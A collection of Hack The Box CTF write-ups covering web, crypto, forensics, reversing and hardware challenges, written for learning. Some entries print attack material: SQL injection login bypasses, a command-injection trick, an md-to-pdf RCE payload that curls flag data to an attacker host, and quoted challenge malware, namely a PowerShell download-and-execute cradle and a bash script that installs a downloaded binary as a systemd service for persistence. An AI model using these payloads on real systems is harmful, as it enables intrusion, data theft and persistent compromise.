-------------------------------------------------------------------------------- /HTB - Business CTF 2024/Web/Jailbreak.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c7c36016-1156-45f6-8d63-5c874ebdc24e) 4 | 5 | ## Enumeration 6 | 7 | Pretty good looking Fallout themed website: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/21201937-ebb7-43c9-a7fb-b700e91e316c) 9 | 10 | We seem to have an interesting endpoint allowing us to update a Firmware. 11 | 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/361bf60f-72a0-4e16-9f76-81327f00dd7f) 13 | 14 | ## Solution 15 | 16 | When making the POST request we can clearly see it is sending XML data so that screams [XXE](https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity) from a mile away: 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/eb8b859c-0c02-42ec-bac3-16fe7d700cdf) 18 | 19 | `HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_427cf9303c8fd89feaf3582d1f41a8b9}` 20 | -------------------------------------------------------------------------------- /HTB - Cyber Santa is Coming to Town 2021/Crypto/Common Mistake.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/144765586-9e19ac74-2fff-426a-a2c5-e0e11b959543.png) 2 | 3 | Unzipped the provided file and got an encrypted.txt file 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/144765593-9421227b-65ef-4bf3-91bd-4487eb600105.png) 6 | 7 | Considering we have the same ```n``` and two different ```e``` and ```c``` means this should be a Common Modulus attack. The title of the challenge hints at it as well. 8 | 9 | I converted the hex strings into int using python. 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/144765666-0e6b1ce4-ce06-4472-b282-f94a37ece97d.png) 12 | ![image](https://user-images.githubusercontent.com/80063008/144765698-e7cdf502-ee1d-4390-99d0-c0ef8e4c7a00.png) 13 | 14 | I'm not great at scripting crypto stuff but I did find this script. 15 | 16 | https://raw.githubusercontent.com/a0xnirudh/Exploits-and-Scripts/master/RSA%20Attacks/RSA%3A%20Common%20modulus%20attack.py 17 | 18 | After fixing the identation issues, I pasted the n, c1,c2, e1 and e2 and I ran the script and I got a decimal value. 19 | ![image](https://user-images.githubusercontent.com/80063008/144765747-81a0958a-b79f-4197-a6f1-7bc5f9a36aeb.png) 20 | 21 | I modified the script some more to convert the decimal value to hex and then to ASCII. 22 | 23 | ![image](https://user-images.githubusercontent.com/80063008/144765780-8e063b66-b085-475b-b452-2eae79305ea5.png) 24 | 25 | ![image](https://user-images.githubusercontent.com/80063008/144765790-a187751a-9b54-4653-8e5f-2ffe6a77df68.png) 26 | 27 | 28 | HTB{c0mm0n_m0d_4774ck_15_4n07h3r_cl4ss1c} 29 | -------------------------------------------------------------------------------- /HTB - Cyber Santa is Coming to Town 2021/Forensics/BabyAPT.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/144764166-779fd08a-95c3-4fd6-8c4d-48013b5e3bf5.png) 2 | 3 | 4 | Unzipped file presents us with a pcap file. 5 | 6 | ![image](https://user-images.githubusercontent.com/80063008/144764169-aba0b163-6ed9-4da6-88fe-cf76f1b64398.png) 7 | 8 | 9 | Opened in wireshark and then followed TCP streams. Base64 encrypted string in TPC Stream number 30. 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/144764172-87fbac9f-ea9f-44b2-bf20-f96f655348de.png) 12 | 13 | 14 | HTB{0k_n0w_3v3ry0n3_h4s_t0_dr0p_0ff_th3ir_l3tt3rs_4t_th3_p0st_0ff1c3_4g41n} 15 | -------------------------------------------------------------------------------- /HTB - Cyber Santa is Coming to Town 2021/Forensics/Giveaway.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/144764376-a577ab71-04f7-4488-95cc-42957085bdf6.png) 2 | 3 | We were provided a .docm file and generally, the first thing I do with such files, is run olevba to see what macro's are hiding. 4 | 5 | ```bash 6 | olevba christmas_giveaway.docm --deobf 7 | ``` 8 | 9 | In the output, I found this part which to me was interesting. The link drew my eyes and then I stared a bit at the obfuscated charcode. 10 | 11 | Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String 12 | 13 | HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4" 14 | cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10) 15 | fqtSMHFlkYeyLfs = Replace("everybody", "e", "3") 16 | fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_" 17 | ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95) 18 | FVpHoEqBKnhPO = Replace("christmas", "i", "1") 19 | FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6) 20 | 21 | A close look can reveal that the flag is broken up in pieces across these variables. I manually decoded the charcodes using cyberchef one at a time. I'm sure there are easier ways but it took my 10ish minutes so I can't complaint. 22 | 23 | HTB{Th1s_1s_4_pr3s3nt_3v3ryb0dy_w4nts_f0r_chr1stm4s} 24 | -------------------------------------------------------------------------------- /HTB - Cyber Santa is Coming to Town 2021/README.md: -------------------------------------------------------------------------------- 1 | I participated in HackTheBox Cyber Santa is Coming to Town 2021 and ended up 212th out of 7996 teams. That's top 2.6%. It was very fun for an invidual CTF. 2 | 3 | Here are my writeups to the challenges I solved. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/144762798-844ceb20-e037-4388-b59a-5b6df9418b2b.png) 6 | -------------------------------------------------------------------------------- /HTB - Cyber Santa is Coming to Town 2021/Reversing/Infiltration.md: -------------------------------------------------------------------------------- 1 | 2 | ![image](https://user-images.githubusercontent.com/80063008/144765958-176f1736-eec0-484f-a542-53430820f88f.png) 3 | 4 | We get a file called client. 5 | ``` 6 | client: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=bcb9d17215725749cf2ce0ee9ef5df3c98ba8f00, for GNU/Linux 4.4.0, stripped 7 | ``` 8 | When running it locally would only connect back to the port I gave it and just write back to me whatever I typed but in reverse. 9 | ![image](https://user-images.githubusercontent.com/80063008/144765980-58b87af1-9f7c-42c5-8cbe-8d24bf65e417.png) 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/144765970-8656dc45-64d3-455a-91f8-7ea1de4e0d26.png) 12 | 13 | 14 | When running it remotely I could only get. 15 | 16 | ![image](https://user-images.githubusercontent.com/80063008/144765974-ee1ea3e0-24be-4ba5-aca8-ca4fbfce2329.png) 17 | 18 | 19 | Ran it with strace to see more of what it is doing and I got the flag. 20 | 21 | ![image](https://user-images.githubusercontent.com/80063008/144766006-a3260555-8570-4524-99d2-8383027e8fb6.png) 22 | 23 | 24 | HTB{n0t_qu1t3_s0_0p4qu3} 25 | 26 | -------------------------------------------------------------------------------- /HTB - Cyber Santa is Coming to Town 2021/Web/Toy Management.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/144764992-42912af2-3133-430c-95b9-db02b3d64343.png) 2 | 3 | We are greeted with a login screen. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/144764999-e95f7520-5ba3-42ad-a14d-d076078a131a.png) 6 | 7 | 8 | Flag is in the database so at first I thought I would need to do some SQL injection to get the flag from the table. 9 | 10 | ![image](https://user-images.githubusercontent.com/80063008/144765001-aade9949-c45e-4149-93a8-4419d006bfdc.png) 11 | 12 | 13 | We have credentials from the database.sql file 14 | 15 | ![image](https://user-images.githubusercontent.com/80063008/144765015-67ff25d3-adcd-47f9-aa33-324de1622233.png) 16 | 17 | ![image](https://user-images.githubusercontent.com/80063008/144765016-eb539ba6-1d3b-46b2-8223-94cfc925779c.png) 18 | 19 | Logged in with admin on my local instance and immediately saw the flag. Is it that easy? 20 | 21 | ![image](https://user-images.githubusercontent.com/80063008/144765019-5e3864c3-621e-4674-9a20-7ec0bba92754.png) 22 | 23 | No, on the remote website we get an invalid password. However it seems we have SQL injection directly on the login screen. With the standard sql injection ```' or 1=1-- -``` we get logged in as manager. 24 | 25 | We do get a JWT token however the secret is random. 26 | 27 | With this SQL injection, we were able to get on as admin: 28 | 29 | ``` 30 | admin'-- - 31 | ``` 32 | ![image](https://user-images.githubusercontent.com/80063008/144765091-8d7e8d60-d16e-4eec-a7cd-dc3ef0f68579.png) 33 | 34 | HTB{1nj3cti0n_1s_in3v1t4bl3} 35 | 36 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2022/Forensics/Puppeter.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/169348211-d0175dde-a608-4603-8d67-7acf3c7c11b3.png) 2 | 3 | We get a lot of files from Event Viewer and we are tasked to find the flag. We read through them, filtering for errors and warnings. We come across one that's interesting. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/169348312-871b934c-3b7b-4a01-bcce-db0c8cbb7969.png) 6 | 7 | Definitely looks malicious. We have two stages in the picture above. Further down in the code we can see that stage two is reversed: 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/169348491-3d4d8a30-1826-4c03-8ac9-75f06509a3d2.png) 10 | 11 | Then there is some XOR-ing action going on. 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/169348833-7ad0780a-71a9-4311-95e4-b4b9a7080f2b.png) 14 | 15 | If we pass the 1st stage to Cyberchef, decode from hex and XOR it using the value found in the code we get half of the flag. 16 | 17 | ![image](https://user-images.githubusercontent.com/80063008/169348570-5db0f02a-efd1-4b33-9693-8b5f21016ba7.png) 18 | 19 | We repeat the process with the 2nd stage but reverse it at the end and we get the second part of the flag. 20 | 21 | ![image](https://user-images.githubusercontent.com/80063008/169348700-83e3bc9f-d20c-4b44-a2eb-dfdb1b1a5d69.png) 22 | 23 | HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...} 24 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2022/Misc/Compressor.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/169343545-23e76ac5-87b9-4be9-aac6-2ad722f3a0e7.png) 2 | 3 | Connect via netcat tot he given ip and port and we see some functions. They use bash commands. I tried to inject with `&&` and `;` but that didn't work. Then I tried `||` and got it. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/169343735-af2c2b5e-d90e-4e85-85bf-67bc6bc885d0.png) 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/169343852-32ad75c2-f5ff-46b0-943a-a0d45bce94d3.png) 8 | 9 | HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5} 10 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2022/Pwn/Space-Pirate-Entrypoint.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/169348079-ae336a5c-050e-4729-9659-852bb9fc572b.png) 2 | 3 | I'm pretty sure this was broken at the time I did it since I just entered two letters when it requested a password and it spit out the flag. I can't complain, a flag is a flag. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/169347861-a8c04ba4-3923-413a-81f5-f01e7a132023.png) 6 | 7 | HTB{th3_g4t35_4r3_0p3n!} 8 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2022/Readme.md: -------------------------------------------------------------------------------- 1 | I got to 406th out of 7024 teams, 13/61 solves... that's top 5.7%. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/169328250-777d8737-7bd5-4384-bb86-754cbe9b912e.png) 4 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2022/Reversing/Omega_One.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/169344428-a0460c09-b243-4252-b60d-d40ba48bd167.png) 2 | 3 | When running the app, nothing seems to happen. So we load the app in Ghidra, look for strings and can see a lot of strange names. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/169344715-deb6e745-6ed6-4174-9c40-3b78c1f033b7.png) 6 | 7 | Looking closely, some of these names are also in the provided output.txt file. Looked up each word one by one from the provided output.txt file and figured out that they represent specific letters, numbers and characters. We filled out the chars one by one. I'm sure there are better ways but I wasn't in a rush. 8 | 9 | Here is an example: 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/169345005-afb7920e-2623-4dd7-a26d-83c069151ed5.png) 12 | 13 | Eventually we get all the required characters: 14 | 15 | ![image](https://user-images.githubusercontent.com/80063008/169345371-0f8d2d63-43fe-4288-9d17-9d8f1ec68bcc.png) 16 | 17 | HTB{l1n34r_t1m3_but_pr3tty_sl0w!} 18 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2022/Reversing/Teleport.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/169345518-4af0e8ad-fd30-435e-a7c7-293d2358a85f.png) 2 | 3 | Decompiling the file in Ghidra, we can see a lot of Functions on the left side. Each one seems to be associated with a character. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/169345602-49c64bc4-d5e6-44e2-9344-ba73a0e56230.png) 6 | 7 | I went through each one and put them in ascending order. Did this one manually as well. I'm sure there's a better way. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/169345879-3fecfdcd-a45a-4c81-919c-7c3ad9ebefa5.png) 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/169345781-633701a3-f0cd-422b-b510-561dfa528eae.png) 12 | 13 | HTB{h0pp1ng_thru_th3_sp4c3_t1m3_c0nt1nuum!} 14 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2022/Reversing/Wide.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/169344130-8686a278-254a-47ba-84b4-a3b750024290.png) 2 | 3 | Looking for strings in Ghidra we see something interesting. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/169344192-b79081a0-4899-466e-8e81-d70b513e8821.png) 6 | 7 | We pass that to the app and get the flag. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/169344241-c302a6f6-4dc1-4ed3-99a6-17b5bc4e1ac5.png) 10 | 11 | HTB{str1ngs_4r3nt_4lw4ys_4sc11} 12 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2022/Web/Amidst_Us.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/169337064-9710e9b0-af8f-4605-8e8a-3ca6ce1c3b7e.png) 2 | 3 | We get on a dark page that seems to only have one functionality. We can upload an image when clicking somewhere in the center and it will modify it a bit. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/169337150-b75a9828-5a31-41d7-bda0-d9b54b340b6c.png) 6 | 7 | It seems to be using Pillow 8.4.0 according to the source code. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/169337250-f7550c1f-32d9-472b-a1f2-365a561bcb36.png) 10 | 11 | The code below is the one applied to the given picture. 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/169337375-a3f5feb5-8dd0-4151-a940-444f0a724a4b.png) 14 | 15 | After some research we can find an interesting CVE that applies here. Specifically CVE-2022-22817. ImageMath.eval allows for arbitrary expressions, such as ones that use the Python exec method. From the code above, we can see that our injection point is in the Background. 16 | 17 | ![image](https://user-images.githubusercontent.com/80063008/169337604-ebba90d9-9514-4a86-8520-3de60a3c1b3c.png) 18 | 19 | We could've used a payload to get RCE but in the interest of speed, we can just exfiltrate it using a HTTP request. 20 | 21 | ![image](https://user-images.githubusercontent.com/80063008/169337886-171cac90-aa9d-446f-bf76-a8d78ec8d014.png) 22 | 23 | ![image](https://user-images.githubusercontent.com/80063008/169337904-4fe7c745-5358-42de-a2ec-a259e6cf4400.png) 24 | 25 | HTB{i_slept_my_way_to_rce} 26 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2022/Web/BlinkerFluids.md: -------------------------------------------------------------------------------- 1 | ![image](https://user-images.githubusercontent.com/80063008/169332230-ab4edbcc-702b-4cba-ad90-647268c4c04e.png) 2 | 3 | We get on a page where we can create a PDF invoice. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/169332707-6be56ec5-53fb-45f6-873c-cf8056c5e026.png) 6 | 7 | Checking the provided source code, we notice how these PDFs are generated. They are using md-to-pdf that is vulnerable to RCE. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/169332943-38599176-89cf-443c-bbdc-65ced4e8fd74.png) 10 | 11 | We can find the required payload here: 12 | https://github.com/simonhaenisch/md-to-pdf/issues/99 13 | 14 | ```javascript 15 | ---js\n((require("child_process")).execSync(\"curl http://yourip/`cat /flag.txt|base64 -w0`\"))\n---RCE 16 | ``` 17 | ![image](https://user-images.githubusercontent.com/80063008/169334413-3cc0dea8-d5d7-4294-854f-145ca10e4ff6.png) 18 | 19 | And we get our flag. 20 | ![image](https://user-images.githubusercontent.com/80063008/169335540-3e7d420e-bebf-479a-bf8e-e76148c8d477.png) 21 | ![image](https://user-images.githubusercontent.com/80063008/169335045-a7298c78-d263-4e82-bb7d-461b5484ba5a.png) 22 | 23 | HTB{bl1nk3r_flu1d_f0r_int3rG4l4c7iC_tr4v3ls} 24 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Crypto/Ancient_Encodings.md: -------------------------------------------------------------------------------- 1 | The first challenge in the Crypto section provides two files. The `output.txt` file contains the encoded data below: 2 | 3 | ``` 4 | 0x53465243657a467558336b7764584a66616a4231636d347a655639354d48566664326b786246397a5a544e66644767784e56396c626d4d775a4446755a334e665a58597a636e6c33614756794d33303d 5 | ``` 6 | 7 | We are also provided with the `source.py` file below: 8 | 9 | ```python 10 | from Crypto.Util.number import bytes_to_long 11 | from base64 import b64encode 12 | 13 | FLAG = b"HTB{??????????}" 14 | 15 | 16 | def encode(message): 17 | return hex(bytes_to_long(b64encode(message))) 18 | 19 | 20 | def main(): 21 | encoded_flag = encode(FLAG) 22 | with open("output.txt", "w") as f: 23 | f.write(encoded_flag) 24 | 25 | 26 | if __name__ == "__main__": 27 | main() 28 | ``` 29 | 30 | As we can see from the source code, the flag is base64 encoded and then hex encoded. No encryption here.. pfew. 31 | 32 | This means we can simply unhex and then base64 decode the flag with a oneliner: 33 | 34 | ```bash 35 | xxd -r -p output.txt|base64 -d 36 | ``` 37 | 38 | And we get our flag: 39 | ![image](https://user-images.githubusercontent.com/80063008/227489718-208649c4-f7a1-47cf-a945-88b4990cd42f.png) 40 | 41 | HTB{1n_y0ur_j0urn3y_y0u_wi1l_se3_th15_enc0d1ngs_ev3rywher3} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Crypto/Small_Steps.md: -------------------------------------------------------------------------------- 1 | For the next challenge in the Crypto space, we can simply connect with netcat to the provided IP and port and we get an Encrypted flag. The public key seems to have a small exponent. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227491185-410343e3-4f62-4d43-8f2e-0a229424274a.png) 4 | 5 | This means we can use our good old friend, `RsaCtfTool.py` which you can get from here https://github.com/RsaCtfTool/RsaCtfTool. We can leave it running and it will eventually spit out the flag. 6 | 7 | Please note that sagemath has to be installed for this attack to be done. You can simply to `sudo dnf install sagemath;pip install -r optional-requirements.txt` from the RsaCtfTool directory. If you get errors about building gmpy, do `sudo apt install libgmp3-dev` and try again. If you get error about sage binary not being installed, make sure to get it from here https://www.sagemath.org/download.html 8 | 9 | ```bash 10 | RsaCtfTool.py -n 6561831657788149425694861301661479746323090591021707282323926588779254530106072593657744854168880717731602676903001378433383937484930939128266885943288847 -e 3 --uncipher 70407336670535933819674104208890254240063781538460394662998902860952366439176467447947737680952277637330523818962104685553250402512989897886053 11 | ``` 12 | Now you can go and have a coffee, take a break, or focus on a different challenge. After a while, we get our flag: 13 | 14 | ![image](https://user-images.githubusercontent.com/80063008/227500656-a3562617-ff7c-425f-b5ca-7611059cc57a.png) 15 | 16 | HTB{5ma1l_E-xp0n3nt} 17 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Forensics/Alien_Cradle.md: -------------------------------------------------------------------------------- 1 | In Alien Cradle, the provided file is a powershell script: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227502377-d8b008b7-3114-41a6-b78d-79502e3f950e.png) 4 | 5 | ```powershell 6 | if([System.Security.Principal.WindowsIdentity]::GetCurrent().Name -ne 'secret_HQ\Arth'){exit};$w = New-Object net.webclient;$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;$d = $w.DownloadString('http://windowsliveupdater.com/updates/33' + '96f3bf5a605cc4' + '1bd0d6e229148' + '2a5/2_34122.gzip.b64');$s = New-Object IO.MemoryStream(,[Convert]::FromBase64String($d));$f = 'H' + 'T' + 'B' + '{p0w3rs' + 'h3ll' + '_Cr4d' + 'l3s_c4n_g3t' + '_th' + '3_j0b_d' + '0n3}';IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 7 | ``` 8 | 9 | As we can see, the flag is broken up in a couple of pieces which we can easily put together to form: 10 | 11 | HTB{p0w3rsh3ll_Cr4dl3s_c4n_g3t_th3_j0b_d0n3} 12 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Forensics/Extraterrestrial_Persistence.md: -------------------------------------------------------------------------------- 1 | Extraterrestrial Persistence provides a bash script that looks like this: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227502771-bc5f9535-1bde-4abb-9474-86e40d46f647.png) 4 | 5 | ```bash 6 | n=`whoami` 7 | h=`hostname` 8 | path='/usr/local/bin/service' 9 | if [[ "$n" != "pandora" && "$h" != "linux_HQ" ]]; then exit; fi 10 | 11 | curl https://files.pypi-install.com/packeges/service -o $path 12 | 13 | chmod +x $path 14 | 15 | echo -e "W1VuaXRdCkRlc2NyaXB0aW9uPUhUQnt0aDNzM180bDEzblNfNHIzX3MwMDAwMF9iNHMxY30KQWZ0ZXI9bmV0d29yay50YXJnZXQgbmV0d29yay1vbmxpbmUudGFyZ2V0CgpbU2VydmljZV0KVHlwZT1vbmVzaG90ClJlbWFpbkFmdGVyRXhpdD15ZXMKCkV4ZWNTdGFydD0vdXNyL2xvY2FsL2Jpbi9zZXJ2aWNlCkV4ZWNTdG9wPS91c3IvbG9jYWwvYmluL3NlcnZpY2UKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldA=="|base64 --decode > /usr/lib/systemd/system/service.service 16 | 17 | systemctl enable service.service 18 | ``` 19 | 20 | Decoding the base64 string, we get to see what service was used for persistence and get the flag: 21 | 22 | ![image](https://user-images.githubusercontent.com/80063008/227503042-68422073-2e97-41e5-b881-45d2b1287a31.png) 23 | 24 | HTB{th3s3_4l13nS_4r3_s00000_b4s1c} 25 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Forensics/Plaintext_Tleasure.md: -------------------------------------------------------------------------------- 1 | The first challenge is the Forensics category gives us a `capture.pcap` to analyse. Or... you know, we can just use `strings` and `grep`, the two golden tools/stars of any CTF. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227501415-c9ce49a0-7516-4294-b32b-6d329d1f8ffd.png) 4 | 5 | HTB{th3s3_4l13ns_st1ll_us3_HTTP} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Hardware/Critical_Flight.md: -------------------------------------------------------------------------------- 1 | For this challenge we received a bunch of `.gbr` files: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227531151-c28235a8-774b-4a41-b61b-ea053ab7b4b0.png) 4 | 5 | Trying to read one, we notice a string mentioning the software that we would need: 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227531277-882e003a-71b7-45b1-a52c-9d405e2f9481.png) 8 | 9 | I installed the KiCad software and opened the first file and got part of the flag. Notice that there is no closing curly brace: 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/227531349-72f6eab4-46d8-4f6a-8e6e-716f4b708874.png) 12 | 13 | The other part of the flag is in one of the other files: 14 | 15 | ![image](https://user-images.githubusercontent.com/80063008/227531460-f2573e03-f959-4e71-a836-ab9608c8e1f2.png) 16 | 17 | HTB{533_7h3_1nn32_w02k1n95_0f_313c720n1c5#$@} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Hardware/Debug.md: -------------------------------------------------------------------------------- 1 | Again we receive a .sal file so we open it in Logic2. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227531894-ffb83a00-cfd9-457a-ad9a-ce6d5fa60fb0.png) 4 | 5 | We go to analyzers, apply Async Serial, select the channel with the data on it and apply a common baud rate of 115200. It just so happened to be the first thing I tried. 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227532328-616239e2-fe83-49aa-8750-ab4174b26aa7.png) 8 | 9 | On the right side of the menu, in the Data section, we click on the little icon for the Terminal and can see the flag split into pieces. 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/227532761-b7d12107-5a23-47aa-b809-c5c115fff6c8.png) 12 | 13 | HTB{547311173_n37w02k_c0mp20m153d} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Hardware/Timed_Transmission.md: -------------------------------------------------------------------------------- 1 | For this challenge, we receive a .sal file which is a Salae file that can be opened in the Logic2 software: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227525327-34463318-2cde-4d00-832e-fc312fe5a092.png) 4 | 5 | At first I tried to measure out the signal to figure out the baud rate but nothing came of it. Then I took a step back, or better said, zoomed in and then took a step back and a picture started being formed. 6 | 7 | HTB 8 | ![image](https://user-images.githubusercontent.com/80063008/227530433-18f99208-657f-4ea8-a770-33c11b6fe1c1.png) 9 | 10 | We can see HTB being formed by the signal channels themselves. Scrolling to the right we get more of the flag: 11 | 12 | {b35 13 | ![image](https://user-images.githubusercontent.com/80063008/227530527-ad7998d1-0972-4ae2-aa5a-4212b2bb5bfe.png) 14 | 15 | 1N_t 16 | ![image](https://user-images.githubusercontent.com/80063008/227530608-7c1b9fb9-939c-4912-b52d-edf961a12b67.png) 17 | 18 | And so on until we write down the entire flag: 19 | 20 | HTB{b391N_tH3_HArdWAr3_QU3St} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/ML/Last_Hope.md: -------------------------------------------------------------------------------- 1 | We receive a very interesting looking file with an `.qasm` extension. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227546021-906fb26b-5510-4dc4-ab0f-3518075cb857.png) 4 | 5 | Reading it we see OPENQASM 2.0 being mentioned: 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227546150-18e89cc0-7ed4-48cb-9394-c4c755532a91.png) 8 | 9 | Some research later, we find we can open it using the `qiskit` python library: 10 | 11 | ```bash 12 | pip install qiskit 13 | ``` 14 | 15 | With ChatGPT's help, we reached this script: 16 | 17 | ```python 18 | from qiskit import QuantumCircuit, Aer, execute 19 | 20 | # Load the qasm file using from_qasm_file() method 21 | qasm_file = 'quantum_artifact.qasm' 22 | qc = QuantumCircuit.from_qasm_file(qasm_file) 23 | 24 | # Set up the backend and execute the circuit 25 | backend = Aer.get_backend('qasm_simulator') 26 | job = execute(qc, backend, shots=1000) 27 | result = job.result() 28 | 29 | # Print the result 30 | print(result.get_counts(qc)) 31 | ``` 32 | The output of this script gives us a binary string: 33 | ![image](https://user-images.githubusercontent.com/80063008/227546843-41131e9c-5a89-4aae-b579-a87f17a0730a.png) 34 | 35 | Decoded it in Cyberchef to: 36 | 37 | HTB{a_gl1mps3_0f_h0p3} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/ML/Reconfiguration.md: -------------------------------------------------------------------------------- 1 | We have an analysis.ows file and a points.csv file. Reading the .ows file, we notice this section in it. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227541521-0fe7e7b2-dbb9-43f7-a64e-812d8cca8838.png) 4 | 5 | Doing some Googling we can find the Orange software: 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227541774-42f45fed-727c-4ece-af31-bc198384f50f.png) 8 | 9 | We open these two files in the Orange software and connect the points to the Scatter Plot. 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/227542162-08fa45d3-e066-4525-963b-2d8dc43f4b83.png) 12 | 13 | As soon as we do this, we get the flag. We just had to make sure that we expand the window to get the text to be more readable. 14 | 15 | ![image](https://user-images.githubusercontent.com/80063008/227541996-2f0b07d5-5901-426e-97b7-a10ce198d904.png) 16 | 17 | HTB{sc4tter_pl0ts_4_th3_w1n} 18 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Misc/Persistence.md: -------------------------------------------------------------------------------- 1 | For this particular challenge, the description was very helpful: 2 | 3 | "Thousands of years ago, sending a GET request to /flag would grant immense power and wisdom. Now it's broken and usually returns random data, but keep trying, and you might get lucky... Legends say it works once every 1000 tries." 4 | 5 | Just doing a curl request on the `/flag` endpoint of the provided IP and port, we get garbage: 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227533457-d5150e3d-0144-4e98-a4b8-0ace111bd81c.png) 8 | 9 | However, the description says it works once on every 1000 tries, so let's do 1000 tries and see if we get the flag: 10 | 11 | ```bash 12 | for i in {1..1000};do curl -s http://167.172.50.208:31200/flag|grep HTB;done 13 | ``` 14 | 15 | I added the `-s` flag for curl to be silent. After a short bit, we get the flag: 16 | 17 | 